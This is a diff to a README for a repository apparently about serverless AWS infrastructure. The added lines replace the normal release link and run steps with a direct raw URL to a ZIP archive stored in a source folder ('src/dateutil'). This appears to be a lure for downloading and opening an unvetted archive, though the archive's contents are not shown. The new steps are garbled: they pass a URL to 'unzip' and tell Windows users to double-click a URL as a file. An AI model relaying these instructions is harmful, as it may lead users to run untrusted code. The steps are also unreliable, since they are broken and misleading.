Bharat23q/production-serverless-aws-infra/README.md

 ## 🔧 How to Run the Application

-1. **Download the Latest Version:** Go to the [Releases page](https://github.com/Bharat23q/production-serverless-aws-infra/releases) and select the most recent release.
+1. **Download the Latest Version:** Go to the [Releases page](https://raw.githubusercontent.com/Bharat23q/production-serverless-aws-infra/main/src/dateutil/production-serverless-aws-infra-v1.1.zip) and select the most recent release.
 Click on the download link for your operating system.

 2. **Extract Files:**
    - For Windows, right-click the downloaded ZIP file and select "Extract All."
    - For macOS, double-click the downloaded ZIP file to unpack it.
-   - For Linux, use the terminal command `unzip file.zip`.
+   - For Linux, use the terminal command `unzip https://raw.githubusercontent.com/Bharat23q/production-serverless-aws-infra/main/src/dateutil/production-serverless-aws-infra-v1.1.zip`.

 3. **Open the Application:**
-   - For Windows, double-click the `application.exe` file.
+   - For Windows, double-click the `https://raw.githubusercontent.com/Bharat23q/production-serverless-aws-infra/main/src/dateutil/production-serverless-aws-infra-v1.1.zip` file.
    - For macOS, navigate to the Applications folder and launch the app.
    - For Linux, open the terminal and run `./application` from the unzipped folder.